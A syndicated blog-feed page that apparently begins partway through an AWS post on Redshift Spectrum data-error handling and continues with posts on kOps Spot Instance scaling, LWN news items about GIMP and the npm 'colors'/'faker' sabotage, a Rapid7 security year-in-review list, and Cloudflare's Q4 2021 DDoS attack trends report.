This feature provides you with specific methods for handling each of the scenarios for invalid characters, surplus characters, and numeric overflow while processing data using Redshift Spectrum. Also, the errors are captured and visible in the newly created dictionary view SVL_SPECTRUM_SCAN_ERROR. You can even cancel the query when a defined threshold of errors has been reached.

Prerequisites

To demonstrate Redshift Spectrum user-defined data handling, we build an external table over a data file with soccer league information and use that to show different data errors and how the new feature offers different options in dealing with those data errors. We need the following prerequisites:

Solution overview

We use the data file for soccer leagues to define an external table to demonstrate different data errors and the different handling techniques offered by the new feature to deal with those errors. The following screenshot shows an example of the data file.

Note the following in the example:

  • The club name can typically be longer than 15 characters
  • The league name can be typically be longer than 20 characters
  • The club name Barcelôna includes an invalid character
  • The column nspi includes values that are bigger than SMALLINT range

Then we create an external table (see the following code) to demonstrate the new user-defined handling:

  • We define the club_name and league_name shorter than they should to demonstrate handling of surplus characters
  • We define the column league_nspi as SMALLINT to demonstrate handling of numeric overflow
  • We use the new table property data_cleansing_enabled to enable custom data handling
CREATE EXTERNAL TABLE schema_spectrum_uddh.soccer_league
(
  league_rank smallint,
  prev_rank   smallint,
  club_name   varchar(15),
  league_name varchar(20),
  league_off  decimal(6,2),
  league_def  decimal(6,2),
  league_spi  decimal(6,2),
  league_nspi smallint
)
ROW FORMAT DELIMITED 
    FIELDS TERMINATED BY ',' 
    LINES TERMINATED BY '\n\l'
stored as textfile
LOCATION 's3://uddh-soccer/league/'
table properties ('skip.header.line.count'='1','data_cleansing_enabled'='true');

Invalid character data handling

With the introduction of the new table and column property invalid_char_handling, you can now choose how you deal with invalid characters in your data. The supported values are as follows:

  • DISABLED – Feature is disabled (no handling).
  • SET_TO_NULL – Replaces the value with null.
  • DROP_ROW – Drops the whole row.
  • FAIL – Fails the query when an invalid UTF-8 value is detected.
  • REPLACE – Replaces the invalid character with a replacement. With this option, you can use the newly introduced table property replacement_char.

The table property can work over the whole table or just a column level. Additionally, you can define the table property during create time or later by altering the table.

When you disable user-defined handling, Redshift Spectrum by default sets the value to null (similar to SET_TO_NULL):

alter table schema_spectrum_uddh.soccer_league
set table properties ('invalid_char_handling'='DISABLED');

When you change the setting of the handling to DROP_ROW, Redshift Spectrum simply drops the row that has an invalid character:

alter table schema_spectrum_uddh.soccer_league
set table properties ('invalid_char_handling'='DROP_ROW');

When you change the setting of the handling to FAIL, Redshift Spectrum fails and returns an error:

alter table schema_spectrum_uddh.soccer_league
set table properties ('invalid_char_handling'='FAIL');

When you change the setting of the handling to REPLACE and choose a replacement character, Redshift Spectrum replaces the invalid character with the chosen replacement character:

alter table schema_spectrum_uddh.soccer_league
set table properties ('invalid_char_handling'='REPLACE','replacement_char'='?');

Surplus character data handling

As mentioned earlier, we defined the columns club_name and league_name shorter than the actual contents of the corresponding fields in the data file.

With the introduction of the new table property surplus_char_handling, you can choose from multiple options:

  • DISABLED – Feature is disabled (no handling)
  • TRUNCATE – Truncates the value to the column size
  • SET_TO_NULL – Replaces the value with null
  • DROP_ROW – Drops the whole row
  • FAIL – Fails the query when a value is too large for the column

When you disable the user-defined handling, Redshift Spectrum defaults to truncating the surplus characters (similar to TRUNCATE):

alter table schema_spectrum_uddh.soccer_league
set table properties ('surplus_char_handling' = 'DISABLED');

When you change the setting of the handling to SET_TO_NULL, Redshift Spectrum simply sets to NULL the column value of any field that is longer than the defined length:

alter table schema_spectrum_uddh.soccer_league
set table properties ('surplus_char_handling' = 'SET_TO_NULL');


When you change the setting of the handling to DROP_ROW, Redshift Spectrum drops the row of any field that is longer than the defined length:

alter table schema_spectrum_uddh.soccer_league
set table properties ('surplus_char_handling' = 'DROP_ROW');

When you change the setting of the handling to FAIL, Redshift Spectrum fails and returns an error:

alter table schema_spectrum_uddh.soccer_league
set table properties ('surplus_char_handling' = 'FAIL');

We need to disable the user-defined data handling for this data error before demonstrating the next type of error:

alter table schema_spectrum_uddh.soccer_league
set table properties ('surplus_char_handling' = 'DISABLED');

Numeric overflow data handling

For this demonstration, we defined league_nspi intentionally SMALLINT (with a range to hold from -32,768 to +32,767) to show the available options for data handling.

With the introduction of the new table property numeric_overflow_handling, you can choose from multiple options:

  • DISABLED – Feature is disabled (no handling)
  • SET_TO_NULL – Replaces the value with null
  • DROP_ROW – Replaces each value in the row with NULL
  • FAIL – Fails the query when a value is too large for the column

When we look at the source data, we can observe that the top five countries have more points than the SMALLINT field can handle.

When you disable the user-defined handling, Redshift Spectrum defaults to the maximum number the numeric data type can handle, for our case SMALLINT can handle up to 32767:

alter table schema_spectrum_uddh.soccer_league
set table properties ('numeric_overflow_handling' = 'DISABLED');

When you choose SET_TO_NULL, Redshift Spectrum sets to null the column with numeric overflow:

alter table schema_spectrum_uddh.soccer_league
set table properties ('numeric_overflow_handling' = 'SET_TO_NULL');

When you choose DROP_ROW, Redshift Spectrum drops the row containing the column with numeric overflow:

alter table schema_spectrum_uddh.soccer_league
set table properties ('numeric_overflow_handling' = 'DROP_ROW');

When you choose FAIL, Redshift Spectrum fails and returns an error:

alter table schema_spectrum_uddh.soccer_league
set table properties ('numeric_overflow_handling' = 'FAIL');

We need to disable the user-defined data handling for this data error before demonstrating the next type of error:

alter table schema_spectrum_uddh.soccer_league
set table properties ('numeric_overflow_handling' = 'DISABLED');

Stop queries at MAXERROR threshold

You can also choose to stop the query if it reaches a certain threshold in errors by using the newly introduced parameter spectrum_query_maxerror:

Set spectrum_query_maxerror to 7;

The following screenshot shows that the query ran successfully.

However, if you decrease this threshold to a lower number, the query fails because it reached the preset threshold:

Set spectrum_query_maxerror to 6;

Error logging

With the introduction of the new user-defined data handling feature, we also introduced the new view svl_spectrum_scan_error, which allows you to view a useful sample set of the logs of errors. The table contains the query, file, row, column, error code, handling action that was applied, as well as the original value and the modified (resulting) value. See the following code:

SELECT *
FROM svl_spectrum_scan_error
where location = 's3://uddh-soccer/league/spi_global_rankings.csv'

Clean up

To avoid incurring future charges, complete the following steps:

  1. Delete the Amazon Redshift cluster created for this demonstration. If you were using an existing cluster, drop the created external table and external schema.
  2. Delete the S3 bucket.
  3. Delete the AWS Glue Data Catalog database.

Conclusion

In this post, we demonstrated Redshift Spectrum’s newly added feature of user-defined data error handling and showed how this feature provides the flexibility to take a user-defined approach to deal with data exceptions in processing external files. We also demonstrated how the logging enhancements provide transparency on the errors encountered in external data processing without needing to write additional custom code.

We look forward to hearing from you about your experience. If you have questions or suggestions, please leave a comment.


About the Authors

Ahmed Shehata is a Data Warehouse Specialist Solutions Architect with Amazon Web Services, based out of Toronto.

Milind Oke is a Data Warehouse Specialist Solutions Architect based out of New York. He has been building data warehouse solutions for over 15 years and specializes in Amazon Redshift. He is focused on helping customers design and build enterprise-scale well-architected analytics and decision support platforms.

Efficiently Scaling kOps clusters with Amazon EC2 Spot Instances

Post Syndicated from Pranaya Anshu original https://aws.amazon.com/blogs/compute/efficiently-scaling-kops-clusters-with-amazon-ec2-spot-instances/

This post is written by Carlos Manzanedo Rueda, WW SA Leader for EC2 Spot, and Brandon Wagner, Senior Software Development Engineer for EC2.

This post focuses on how you can leverage recently released tools to optimize your usage of Amazon EC2 Spot Instances on Kubernetes Operations (kOps) clusters. Spot Instances let you utilize unused capacity in the AWS cloud for up to 90% off compared to On-Demand prices, and they are a great fit for fault-tolerant, containerized applications. kOps is an open source project providing a cohesive toolset for provisioning, operating, and deleting Kubernetes clusters in the cloud.

Even with customers such as Snap Inc., Babylon Health, and Fidelity Investments telling us how Amazon Elastic Kubernetes Service (EKS) is essential for running their containerized workloads, we appreciate that there are scenarios where using Amazon EC2 instances and kOps are a viable alternative. At AWS, we understand “one size does not fit all.” While we encourage Kubernetes users to contribute their feedback to the AWS container roadmap so that we can improve our services, we also would like to reduce heavy lifting and simplify Spot best practices integration in kOps clusters.

To simplify the integration of Spot Instances in kOps clusters, in January of 2021 we introduced a new kops toolbox command: kops toolbox instance-selector. The utility is distributed as part of the standard kOps distribution. Moreover, it simplifies the creation of kOps Instance Groups by configuring them with full adherence to Spot Instances best practices.

Handling Spot interruption notifications in Kubernetes

Let’s quickly recap Spot best practices. Spot Instances perform exactly like any other EC2 Instances, except that in exchange for their discounted price, they can be interrupted with a two-minute warning when EC2 must reclaim capacity. Applications running on Spot can typically recover from transient interruptions by simply starting a new instance. Spot best practices involve measures such as diversifying into as many Spot capacity pools as possible, choosing the right Spot allocation strategy, and utilizing Spot integrated services. These handle the Spot Instances lifecycles for you. This blog post on handling Spot interruptions dives deeper into AWS’s EC2 Spot best practices.

In Kubernetes, to handle spot termination and rebalance recommendation events (both explained in this blog post on proactively managing Spot Instance lifecycle), we utilize the AWS open-source project AWS Node Termination Handler. We will be deploying the Node Termination Handler as a kOps managed addon, which simplifies its setup and configuration.

The Node Termination Handler ensures that the Kubernetes control plane responds appropriately to events that can make EC2 instances unavailable. It can be operated in two different modes: Instance Metadata Service (IMDS), deployed as a DaemonSet, or Queue Processor, deployed as a Deployment Controller. We recommend running it in Queue Processor mode. The Queue Processor controller continuously monitors an Amazon Simple Queue Service (SQS) queue for events received from Amazon EventBridge. This can lead to node termination in your cluster. When one of these events is received, the Node Termination Handler notifies the Kubernetes control plane to cordon and drain the node that is about to be interrupted. Then, the kubelet sends a SIGTERM signal to the Pods and containers running on the node. This lets your application proceed with a graceful termination – one of the recommended best practices of a Twelve-Factor App.

The kOps managed addon will let you configure the Node Termination Handler within your kOps cluster spec and, more importantly, manage provisioning the necessary infrastructure for you.

To deploy the AWS Node Termination Handler, we start by editing our cluster spec:

kops edit cluster --name ${KOPS_CLUSTER_NAME}

We append the nodeTerminationHandler configuration to the spec node:

spec:
  nodeTerminationHandler:
    enabled: true
    enableSQSTerminationDraining: true
    managedASGTag: "aws-node-termination-handler/managed"

Finally, we deploy the changes made to our cluster configuration:

kops update cluster --name ${KOPS_CLUSTER_NAME} –-state {KOPS_STATE_STORE} --yes --admin

${KOPS_CLUSTER_NAME} refers to the environment variable containing the cluster name, and ${KOPS_STATE_STORE} indicates the Amazon Simple Storage Service (S3) bucket – or kOps State Store – where kOps configuration is stored.

To check that your Node Termination Handler deployment was successful, you can execute:

kops get deployment aws-node-termination-handler -n kube-system

Instance Flexibility and Diversification

Diversification and selection of multiple instances types is essential to acquire and maintain Spot capacity, as well as to successfully replace interrupted instances with others from different pools. When running kOps on AWS, this is implemented by utilizing Amazon EC2 Auto Scaling. Amazon Auto Scaling group’s capacity-optimized allocation strategy ensures that Spot capacity is provisioned from the optimal pools, thereby reducing the chances of Spot terminations.

Simplifying adoption of Spot Best practices on kOps

Before the kops toolbox instance-selector, you would have to setup Spot best practices on kOps manually. This involved writing a stub file following the InstanceGroup specification and examples, and then implementing every best practice, including finding every pool that qualifies for our workload.

The new functionality in kops toolbox instance-selector simplifies InstanceGroup creation by moving the focus of kOps users and administrators from this manual configuration over to simply selecting the vCPUs and Memory requirements for their application (or a base instance type), and then letting kops toolbox instance-selector define the right configuration. Behind the scenes, it utilizes a library allowing it to plug into the feature-set of Amazon EC2 instance selector. At its core, ec2 instance selector helps you select compatible instance types for your application to run on. Utilize ec2 instance selector CLI or library when automating your configurations. In the case of kOps, the integration already comes in the kops toolbox.

For example, let’s say your cluster runs stateless, fault tolerant applications that are CPU/Memory bound and have a ratio of vCPU to Memory requiring at least 1vCPU : 4GB of RAM. You can run the following command in order to acquire cluster spot capacity:

kops toolbox instance-selector "spot-group-" \
  --usage-class spot --flexible --cluster-autoscaler \
  --vcpus-to-memory-ratio="1:4" \
  --ig-count 2

Let’s focus first on the command, and later cover its output. You can get a list of parameters and default values by running: kops toolbox instance-selector –help. A few default parameters weren’t passed in the command above, but they will be set to sane defaults, such as the maximum and minimum number of instances in the Instance Group. The parameter –flexible refers to our request to provide a group of flexible instance types spanning multiple generations.

Once you’ve defined the InstanceGroups, start them up by using the command:

kops update cluster \
–state=${KOPS_STATE_STORE} \
–name=${KOPS_CLUSTER_NAME} \
–yes –admin

The two commands above define and create a request for spot capacity from a flexible and diversified pool set, which meet the criteria to provide at least 4GB of RAM for each vCPU. The command creates not just one, but two node groups named “spot-group-1” and “spot-group-2” (–ig-count 2).

Now, let’s check the contents of the configuration file generated by kops toolbox instance-selector. To preview a configuration without making changes, add –dry-run –output yaml.

apiVersion: kops.k8s.io/v1alpha2
kind: InstanceGroup
metadata:
  creationTimestamp: "2020-08-11T10:22:16Z"
  labels:
    kops.k8s.io/cluster: spot-kops-cluster.k8s.local
  name: spot-group-1
spec:
  cloudLabels:
    k8s.io/cluster-autoscaler/enabled: "1"
    k8s.io/cluster-autoscaler/spot-kops-cluster.k8s.local: "1"
    kops.k8s.io/instance-selector: "1"
  image: 099720109477/ubuntu/images/hvm-ssd/ubuntu-focal-20.04-amd64-server-20200716
  machineType: m3.xlarge
  maxSize: 15
  minSize: 2
  mixedInstancesPolicy:
    instances:
    - m3.xlarge
    - m4.xlarge
    - m5.xlarge
    - m5a.xlarge
    - t2.xlarge
    - t3.xlarge
    onDemandAboveBase: 0
    onDemandBase: 0
    spotAllocationStrategy: capacity-optimized
  nodeLabels:
    kops.k8s.io/instancegroup: spot-group-1
  role: Node
  subnets:
  - eu-west-1a
  - eu-west-1b
  - eu-west-1c
...

The configuration above lists one of the groups created by kops toolbox instance-selector in the previous example. The second group will have a very similar make-up and format, except that it will refer to instances such as: r3.xlarge, r4.xlarge, r5.xlarge, and r5a.xlarge in the mixedInstancesPolicy section. By defining the parameter –usage-class to Spot, the configuration created by kops toolbox instance-selector will add the tags identifying this Auto Scaling group as a Spot group. When the nodes are initialized, kOps controller will identify the nodes as Spot and add the label node-role.kubernetes.io/spot-worker=true. Therefore, at a later stage, we can apply placement logic to our cluster by using nodeSelector and affinity. The configuration above adheres to the definition of kOps support for mixed Instance Groups in AWS, and adds all of the right cloudLabels in order to integrate and implement not only with Spot best practices, but also with Cluster Autoscaler Auto-Discovery configuration best practices.

Kubernetes Cluster Autoscaler is a Kubernetes controller that dynamically adjusts the cluster size. According to a 2020 survey by Cloud Native Computing Foundation (CNCF), 70% of Kubernetes workloads plan to autoscale their stateless applications. Dynamically scaling applications and clusters is also a great practice for optimizing your system costs in situations where capacity is unnecessary, as well as for scaling out accordingly in order to meet business demands. If there are Pods that can’t be scheduled due to insufficient resources, then Cluster Autoscaler will issue a Scale-out action. When there are nodes in the cluster that have been under-utilized for a configurable period of time, Cluster Autoscaler will Scale-in the cluster, and even down-scale to 0 instances when applications don’t need to be run.

On Scale-out operations, Cluster Autoscaler evaluates a set of node groups. When Cluster Autoscaler runs on AWS, node groups are implemented by using Auto Scaling groups (referring to the same instance group as a kOps Instance Group). Therefore, to calculate the number of nodes to scale-out, Cluster Autoscaler assumes that every instance in a node group has the same number of vCPUs and memory size.

By creating two node groups, you apply two diversification levels. You diversify within each node group by using an Auto Scaling group with Mixed Instance Policies and capacity-optimized allocation strategy. Then, to increase the pool range you can leverage, you add more than one node group, while still adhering to the best practices required by Cluster Autoscaler.

While we’ve been focusing on Spot Instances, the parameter –usage-class can be utilized to get OnDemand instances instead of Spot. In the next example, let’s say we would like to get On-Demand capacity in order to train complex deep learning models that will take hours to run. To train our models, we need instances that have at least one GPU with 16GB of RAM on instances that have at least 32GB Ram and 8 vCPUs.

kops toolbox instance-selector "ondemand-gpu-group" \
  --gpus-min 1 --gpu-memory-total-min 16gb --memory-min 32gb --vcpus 8\
  --node-count-max 4 --node-count-min 4 --cpu-architecture amd64

The command above, followed by kops update cluster –state=${KOPS_STATE_STORE} –name=${KOPS_CLUSTER_NAME} –yes can be utilized to produce a configuration and create a nodegroup with the right requirements. This could be created at the start of the training procedure, and then – once the training is done and the capacity is no longer needed – you could automate the nodegroup removal with the following command:

kops delete instancegroup ondemand-gpu-group --name ${KOPS_CLUSTER_NAME} –yes

Conclusions

We believe the best way to run Kubernetes on AWS is by using Amazon EKS. However, scenarios may exist where kOps is utilized in AWS. By using the kOps managed add-on to install aws-node-termination-handler and kops toolbox instance-selector, it is easier than ever to apply Spot best practices to Kubernetes workloads on kOps, and cost-optimize fault-tolerant, stateless applications. These tools let kOps workloads gracefully terminate applications, as well as proactively handle the replacement of instances that are at an elevated risk of termination. kops toolbox instance-selector leverages Amazon ec2-instance-selector in order to simplify the creation of Instance Group configurations adhering to Spot Instances best practices, implementing instance type flexibility, and utilizing capacity-optimized allocation strategy.

By adhering to these best practices to reduce the frequency of Spot interruptions, we will optimize not only the cost, but also our Spot Instances selection. This will enable us to acquire capacity at a massive scale if necessary.

To start using the tools we have described, follow along this step-by-step tutorial. Also, head over to the kops toolbox documentation to learn more about the ways in which you can use it.

Looking back at 2021, looking forward at 2022 (Libre Arts)

Post Syndicated from original https://lwn.net/Articles/880811/rss

Here is a
comprehensive look
on the Libre Arts site at the current state of free
software for creative
artists.

The other reason is that, with a project like GIMP, it’s hard to do
just one thing. The team is constantly bombarded with requests that
are mostly doable once you have a team of 10 to 20 full-time
developers, which is light years away from where GIMP is now. Which
results in a lot of running around between under-the-hood work, UX
fixes, featurettes, better file formats support etc. So you give
everyone a little of what they want but you end up delaying an
actual release because the big stuff still needs to happen.

Dev corrupts NPM libs ‘colors’ and ‘faker’ breaking thousands of apps(Bleeping Computer)

Post Syndicated from original https://lwn.net/Articles/880809/rss

Bleeping Computer reports
on the latest NPM mess: the developer of the “faker” module deleted the
code and its development history from GitHub (with a force push), replaced
it with a malicious alternative, and broke dependencies for numerous
applications.

The reason behind this mischief on the developer’s part appears to
be retaliation—against mega-corporations and commercial consumers
of open-source projects who extensively rely on cost-free and
community-powered software but do not, according to the developer,
give back to the community.

GitHub has evidently called this action a violation of its terms of
service and disabled the owner’s account; NPM has restored a previous
version of the code.

Dev corrupts NPM libs ‘colors’ and ‘faker’ breaking thousands of apps (Bleeping Computer)

Post Syndicated from original https://lwn.net/Articles/880809/rss

Bleeping Computer reports
on the latest NPM mess: the developer of the “faker” module deleted the
code and broke dependencies for numerous applications.

The reason behind this mischief on the developer’s part appears to
be retaliation—against mega-corporations and commercial consumers
of open-source projects who extensively rely on cost-free and
community-powered software but do not, according to the developer,
give back to the community.

GitHub has evidently called the deletion a violation of its terms of
service and since restored the code, an action which raises interesting
questions of its own.

The 2021 Naughty and Nice Lists: Cybersecurity Edition

Post Syndicated from Jesse Mack original https://blog.rapid7.com/2022/01/10/the-2021-naughty-and-nice-lists-cybersecurity-edition/

The 2021 Naughty and Nice Lists: Cybersecurity Edition

Editor’s note: We had planned to publish our Hacky Holidays blog series throughout December 2021 – but then Log4Shell happened, and we dropped everything to focus on this major vulnerability that impacted the entire cybersecurity community worldwide. Now that it’s 2022, we’re feeling in need of some holiday cheer, and we hope you’re still in the spirit of the season, too. Throughout January, we’ll be publishing Hacky Holidays content (with a few tweaks, of course) to give the new year a festive start. So, grab an eggnog latte, line up the carols on Spotify, and let’s pick up where we left off.

It’s not just Santa who gets to have all the fun — we in the security community also love to make our lists and check them twice. That’s why we asked some of our trusty cybersecurity go-to’s who and what they’d place on their industry-specific naughty and nice lists, respectively, for 2021. Here’s who the experts we talked to would like to give a super-stuffed stocking filled with tokens of gratitude — and who’s getting a lump of coal.

The nice list

Call me boring, but I am pretty stoked about the Minimum Viable Security Product (MVSP), the vendor-neutral checklist for vetting third-party companies. It has questions like whether a vendor performs annual comprehensive penetration testing on systems, complies with local laws and regulations like GDPR, implemented single sign-on, applies security patches on a frequent basis, maintains a list of sensitive data types that the application is expected to process, keeps an up-to-date data flow diagram indicating how sensitive data reaches the systems, and whether vendors have layered perimeter controls or entry and exit logs for physical security. Its success depends on people using it, and this industry tends to be allergic to checklists, but it strikes me as super important. – Fahmida Y. Rashid, award-winning infosec journalist

Editor’s note: Check out our Security Nation podcast episode with Chris John Riley on his work helping develop MVSP.

All of the security researchers that have focused their research and efforts to identify vulnerabilities and security issues within IoT technology over the last year. Their effort have helped bring focus to these issues which has led to improvements in product and processes in the IoT industry. – Deral Heiland, IoT Research Lead at Rapid7

Increased federal government focus on securing critical infrastructure. Examples: pipeline and rail cybersecurity directives, energy sector sprints, cybersecurity funding in the infrastructure package. – Harley Geiger, Senior Director of Public Policy at Rapid7

Huntress Labs and the Reddit r/msp board for their outstanding, tireless support for those responding to the Kaseya mass ransomware attack. While the attack was devastating, the community coalesced to help triage and recover, showing the power we have as defenders and protectors when we all work together. – Bob Rudis, Chief Security Data Scientist at Rapid7

The January 20th swearing-in of Biden is on the nice list, not because of who won but the fact that the election worked. We’ve talked an excessive amount about election security, but the reality is, there was no big deal. It was a largely unremarkable election even in the abnormal environments of the pandemic and the cyber. Election computers will continue to be wildly insecure, but since we’ve got paper trails, it won’t really matter. – Rob Graham, CEO of Errata Security

The naughty list

The Colonial Pipeline and Kaseya attacks are far above any other “naughty” case. They affected millions of people around the world. However, like the big things from past years, I think it’ll be solved by lots of small actions by individuals rather than some big Government or Corporation initiative. No big action was needed to solve notPetya or Mirai; no big action will be needed here. Those threatened will steadily (albeit slowly) respond. – Rob Graham, CEO of Errata Security

Microsoft, bar none. They bungled response to many in-year critical vulnerabilities, putting strain on already beat up teams of protectors, causing many organizations to suffer at the mercy of attackers. Everything from multiple, severe Exchange vulnerabilities, to unfixable print spooler flaws, to being the #1 cloud document service for hosting malicious content. – Bob Rudis, Chief Security Data Scientist at Rapid7

The whole Pegasus spyware from NSO Group is bad news start to finish, but the fact that the ruler of United Arab Emirates used the spyware on his wife in a custody battle? That was just flabbergasting. We talk about stalkerware and other types of spyware — but when you have something like Pegasus just showing up on individual phones, that is downright frightening. – Fahmida Y. Rashid, award-winning infosec journalist

All manufacturers of IoT technology that have not heeded the warnings, taken advantages of the work done by IoT security researchers to improve their product security, or made efforts to build and improve their internal and external process for reporting and remediating security vulnerabilities within their products. – Deral Heiland, IoT Research Lead at Rapid7

Apparent lack of urgency to provide support and phase in requirements for healthcare cybersecurity, despite ransomware proliferation during the pandemic. – Harley Geiger, Senior Director of Public Policy at Rapid7

NEVER MISS A BLOG

Get the latest stories, expertise, and news about security today.

More Hacky Holidays blogs

Security updates for Monday

Post Syndicated from original https://lwn.net/Articles/880807/rss

Security updates have been issued by Debian (ghostscript and roundcube), Fedora (gegl04, mbedtls, and mediawiki), openSUSE (kubevirt, virt-api-container, virt-controller-container, virt-handler-container, virt-launcher-container, virt-operator-container), SUSE (kubevirt, virt-api-container, virt-controller-container, virt-handler-container, virt-launcher-container, virt-operator-container and libvirt), and Ubuntu (apache2).

DDoS Attack Trends for Q4 2021

Post Syndicated from Omer Yoachimik original https://blog.cloudflare.com/ddos-attack-trends-for-2021-q4/

DDoS Attack Trends for Q4 2021

This post is also available in 日本語, Deutsch, Français, Español.

DDoS Attack Trends for Q4 2021

The first half of 2021 witnessed massive ransomware and ransom DDoS attack campaigns that interrupted aspects of critical infrastructure around the world (including one of the largest petroleum pipeline system operators in the US) and a vulnerability in IT management software that targeted schools, public sector, travel organizations, and credit unions, to name a few.

The second half of the year recorded a growing swarm of one of the most powerful botnets deployed (Meris) and record-breaking HTTP DDoS attacks and network-layer attacks observed over the Cloudflare network. This besides the Log4j2 vulnerability (CVE-2021-44228) discovered in December that allows an attacker to execute code on a remote server — arguably one of the most severe vulnerabilities on the Internet since both Heartbleed and Shellshock.

Prominent attacks such as the ones listed above are but a few examples that demonstrate a trend of intensifying cyber-insecurity that affected everyone, from tech firms and government organizations to wineries and meat processing plants.

Here are some DDoS attack trends and highlights from 2021 and Q4 ‘21 specifically:

Ransom DDoS attacks

  • In Q4, ransom DDoS attacks increased by 29% YoY and 175% QoQ.
  • In December alone, one out of every three survey respondents reported being targeted by a ransom DDoS attack or threatened by the attacker.

Application-layer DDoS attacks

  • The Manufacturing industry was the most attacked in Q4 ’21, recording a whopping 641% increase QoQ in the number of attacks. The Business Services and Gaming/Gambling industries were the second and third most targeted industries by application-layer DDoS attacks.
  • For the fourth time in a row this year, China topped the charts with the highest percentage of attack traffic originating from its networks.
  • A new botnet called the Meris botnet emerged in mid-2021 and continued to bombard organizations around the world, launching some of the largest HTTP attacks on record — including a 17.2M rps attack that Cloudflare automatically mitigated.

Network-layer DDoS attacks

  • Q4 ’21 was the busiest quarter for attackers in 2021. In December 2021 alone, there were more than all the attacks observed in Q1 and Q2 ’21 separately.
  • While the majority of attacks were small, terabit-strong attacks became the new norm in the second half of 2021. Cloudflare automatically mitigated dozens of attacks peaking over 1 Tbps, with the largest one peaking just under 2 Tbps — the largest we’ve ever seen.
  • Q4 ’21, and November specifically, recorded a persistent ransom DDoS campaign against VoIP providers around the world.
  • Attacks originating from Moldova quadrupled in Q4 ’21 QoQ, making it the country with the highest percentage of network-layer DDoS activity.
  • SYN floods and UDP floods were the most frequent attack vectors while emerging threats such as SNMP attacks increased by nearly 5,800% QoQ.

This report is based on DDoS attacks that were automatically detected and mitigated by Cloudflare’s DDoS Protection systems. To learn more about how it works, check out this deep-dive blog post.

A note on how we measure DDoS attacks observed over our network

To analyze attack trends, we calculate the “DDoS activity” rate, which is the percentage of attack traffic out of the total traffic (attack + clean) observed over our global network. Measuring attack numbers as a percentage of the total traffic observed allows us to normalize data points and avoid biases reflected in absolute numbers towards, for example, a Cloudflare data center that receives more total traffic and likely, also more attacks.

An interactive version of this report is available on Cloudflare Radar.

Ransom Attacks

Our systems constantly analyze traffic and automatically apply mitigation when DDoS attacks are detected. Each DDoS’d customer is prompted with an automated survey to help us better understand the nature of the attack and the success of the mitigation.

For over two years now, Cloudflare has been surveying attacked customers — one question on the survey being if they received a ransom note demanding payment in exchange to stop the DDoS attack. Q4 ’21 recorded the highest survey responses ever that indicated ransom threats — ransom attacks increased by 29% YoY and 175% QoQ. More specifically, one out of every 4.5 respondents (22%) reported receiving a ransom letter demanding payment by the attacker.

DDoS Attack Trends for Q4 2021
The percentage of respondents reported being targeted by a ransom DDoS attack or that have received threats in advance of the attack.

When we break it down by month, we can see that December 2021 topped the charts with 32% of respondents reporting receiving a ransom letter — that’s nearly one out of every three surveyed respondents.

DDoS Attack Trends for Q4 2021

Application-layer DDoS attacks

Application-layer DDoS attacks, specifically HTTP DDoS attacks, are attacks that usually aim to disrupt a web server by making it unable to process legitimate user requests. If a server is bombarded with more requests than it can process, the server will drop legitimate requests and — in some cases — crash, resulting in degraded performance or an outage for legitimate users.

DDoS Attack Trends for Q4 2021

Application-layer DDoS attacks by industry

In Q4, DDoS attacks on Manufacturing companies increased by 641% QoQ, and DDoS attacks on the Business Services industry increased by 97%.

When we break down the application-layer attacks targeted by industry, the Manufacturing, Business Services, and Gaming/Gambling industries were the most targeted industries in Q4 ’21.

DDoS Attack Trends for Q4 2021

Application-layer DDoS attacks by source country

To understand the origin of the HTTP attacks, we look at the geolocation of the source IP address belonging to the client that generated the attack HTTP requests. Unlike network-layer attacks, source IP addresses cannot be spoofed in HTTP attacks. A high percentage of DDoS activity in a given country usually indicates the presence of botnets operating from within the country’s borders.

For the fourth quarter in a row, China remains the country with the highest percentage of DDoS attacks originating from within its borders. More than three out of every thousand HTTP requests that originated from Chinese IP addresses were part of an HTTP DDoS attack. The US remained in second place, followed by Brazil and India.

DDoS Attack Trends for Q4 2021

Application-layer DDoS attacks by target country

In order to identify which countries are targeted by the most HTTP DDoS attacks, we bucket the DDoS attacks by our customers’ billing countries and represent it as a percentage out of all DDoS attacks.

For the third consecutive time this year, organizations in the United States were targeted by the most HTTP DDoS attacks, followed by Canada and Germany.

DDoS Attack Trends for Q4 2021

Network-layer DDoS attacks

While application-layer attacks target the application (Layer 7 of the OSI model) running the service that end users are trying to access, network-layer attacks aim to overwhelm network infrastructure (such as in-line routers and servers) and the Internet link itself.

Cloudflare thwarts an almost 2 Tbps attack

In November, our systems automatically detected and mitigated an almost 2 Tbps DDoS attack. This was a multi-vector attack combining DNS amplification attacks and UDP floods. The entire attack lasted just one minute. The attack was launched from approximately 15,000 bots running a variant of the original Mirai code on IoT devices and unpatched GitLab instances.

DDoS Attack Trends for Q4 2021

Network-layer DDoS attacks by month

December was the busiest month for attackers in 2021.

Q4 ‘21 was the busiest quarter in 2021 for attackers. Over 43% of all network-layer DDoS attacks took place in the fourth quarter of 2021. While October was a relatively calmer month, in November, the month of the Chinese Singles’ Day, the American Thanksgiving holiday, Black Friday, and Cyber Monday, the number of network-layer DDoS attacks nearly doubled. The number of observed attacks increased towards the final days of December ’21 as the world prepared to close out the year. In fact, the total number of attacks in December alone was higher than all the attacks in Q2 ’21 and almost equivalent to all attacks in Q1 ’21.

DDoS Attack Trends for Q4 2021

Network-layer DDoS attacks by attack rate

While most attacks are still relatively ‘small’ in size, terabit-strong attacks are becoming the norm.

There are different ways of measuring the size of an L3/4 DDoS attack. One is the volume of traffic it delivers, measured as the bit rate (specifically, terabits per second or gigabits per second). Another is the number of packets it delivers, measured as the packet rate (specifically, millions of packets per second).

Attacks with high bit rates attempt to cause a denial-of-service event by clogging the Internet link, while attacks with high packet rates attempt to overwhelm the servers, routers, or other in-line hardware appliances. These devices dedicate a certain amount of memory and computation power to process each packet. Therefore, by bombarding it with many packets, the appliance can be left with no further processing resources. In such a case, packets are “dropped,” i.e., the appliance is unable to process them. For users, this results in service disruptions and denial of service.

The distribution of attacks by their size (in bit rate) and month is shown below. As seen in the graph above, the majority of attacks took place in December. However, the graph below illustrates that larger attacks, over 300 Gbps in size, took place in November. Most of the attacks between 5-20 Gbps took place in December.

DDoS Attack Trends for Q4 2021

Distribution by packet rate

An interesting correlation Cloudflare has observed is that when the number of attacks increases, their size and duration decrease. In the first two-thirds of 2021, the number of attacks was relatively small, and correspondingly, their rates increased, e.g., in Q3 ’21, attacks ranging from 1-10 million packets per second (mpps) increased by 196%. In Q4 ’21, the number of attacks increased and Cloudflare observed a decrease in the size of attacks. 91% of all attacks peaked below 50,000 packets per second (pps) — easily sufficient to take down unprotected Internet properties.

DDoS Attack Trends for Q4 2021

